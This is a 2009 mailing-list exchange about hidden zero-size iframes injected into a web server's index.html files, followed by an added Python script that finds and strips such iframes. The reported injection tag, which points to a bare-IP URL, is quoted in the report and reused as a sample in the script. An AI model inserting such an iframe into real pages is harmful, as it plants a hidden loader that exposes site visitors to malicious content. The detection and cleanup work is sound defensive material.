On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg <berg@wins.net> wrote:
We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:
src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> </body> </html>
IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.
Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.
Just a heads up for folks; we have a team investigating...
Russell Berg
Dir - Product Development
Airstream Communications
berg@wins.net
715-832-3726
I've run into this sort of attack before, where they change the page to load content from elsewhere, but I couldn't figure out how they managed to write to the sites' pages. They were hosted on a commercial webhost, and so if it was a compromised host (which seemed like the only possibility to me), that didn't speak well for the hosting company. We were having issues with the company anyway, though, so I took down the site, sanitized the pages (and removed a bunch of junk), and put the site back up with another company. But if you figure out how they got write access to a static website, I'd love to hear it.

-N.
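As an added example (my own code, not anything posted in this thread), here is a small Python scanner for the kind of injection Russell reports above: it walks a web root, flags hidden iframes (display:none or a 0x0 frame) in every index file, notes whether the frame's src is a bare IP address rather than a hostname, records each file's mtime so hits can be lined up against the "11:00 hour" window, and strips only the hidden frames so legitimate visible embeds survive. The sample web root is constructed inline; the injected tag is the full form quoted in the report, and the clean page, directory names and hostnames are my assumptions.

```python
"""Find and strip hidden-iframe injections in index files under a web root.
Added example, not code from the thread; sample files are constructed below."""
from __future__ import annotations

import ipaddress
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import urlparse

# Any <iframe ...></iframe> with an empty body; attribute order is not assumed.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>\s*</iframe>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def is_hidden(tag: str) -> bool:
    """True for display:none or a zero-sized frame, the two tricks in the report."""
    t = tag.lower().replace(" ", "")
    zero = re.search(r"""height=["']?0\b""", t) and re.search(r"""width=["']?0\b""", t)
    return "display:none" in t or bool(zero)


def src_is_bare_ip(src: str) -> bool:
    """A frame sourced from a raw IP (as in the report) is rarely legitimate."""
    host = urlparse(src).hostname or ""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


@dataclass
class Finding:
    path: str
    src: str
    bare_ip: bool
    mtime: float   # file modification time, for building the timeline
    tag: str


def scan_html(text: str) -> List[Tuple[str, str]]:
    """Return (src, full tag) for every hidden iframe in one HTML document."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if is_hidden(tag):
            s = SRC_RE.search(tag)
            hits.append((s.group(1) if s else "", tag))
    return hits


def sanitize_html(text: str) -> Tuple[str, int]:
    """Drop hidden iframes only; visible embeds are left untouched."""
    removed = 0

    def repl(m: re.Match) -> str:
        nonlocal removed
        if is_hidden(m.group(0)):
            removed += 1
            return ""
        return m.group(0)

    return IFRAME_RE.sub(repl, text), removed


def scan_tree(root: str, names=("index.html", "index.htm")) -> List[Finding]:
    """Walk root and report hidden iframes in every index file."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() not in names:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            mtime = os.path.getmtime(path)
            for src, tag in scan_html(text):
                findings.append(Finding(path, src, src_is_bare_ip(src), mtime, tag))
    return findings


# Constructed samples. INJECTED is the tag quoted in the report, appended twice
# as described; CLEAN_PAGE carries a visible embed that must not be flagged.
INJECTED = ('<iframe src="http://77.92.158.122/webmail/inc/web/index.php" '
            'style="display: none;" height="0" width="0"></iframe>')
INFECTED_PAGE = f"<html><body><h1>Welcome</h1> {INJECTED} {INJECTED} </body> </html>\n"
CLEAN_PAGE = ('<html><body><iframe src="https://example.com/embed" '
              'width="560" height="315"></iframe></body></html>\n')


def build_sample_tree() -> str:
    """Create a throwaway web root: infected top-level index, clean subdirectory index."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "about"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write(INFECTED_PAGE)
    with open(os.path.join(root, "about", "index.html"), "w") as fh:
        fh.write(CLEAN_PAGE)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for f in scan_tree(root):
        print(f"{f.path}  mtime={f.mtime:.0f}  src={f.src}  bare_ip={f.bare_ip}")
    cleaned, n = sanitize_html(INFECTED_PAGE)
    print(f"removed {n} hidden iframe(s); body intact: {'</body>' in cleaned}")
```

Run it against a real document root by replacing build_sample_tree() with the path, and keep the mtimes: on a static site a cluster of index files all modified in the same hour, with nothing else touched, is the first clue toward how the writer got in (FTP credentials, a shared host, or a deploy account), which is exactly the question N. raises.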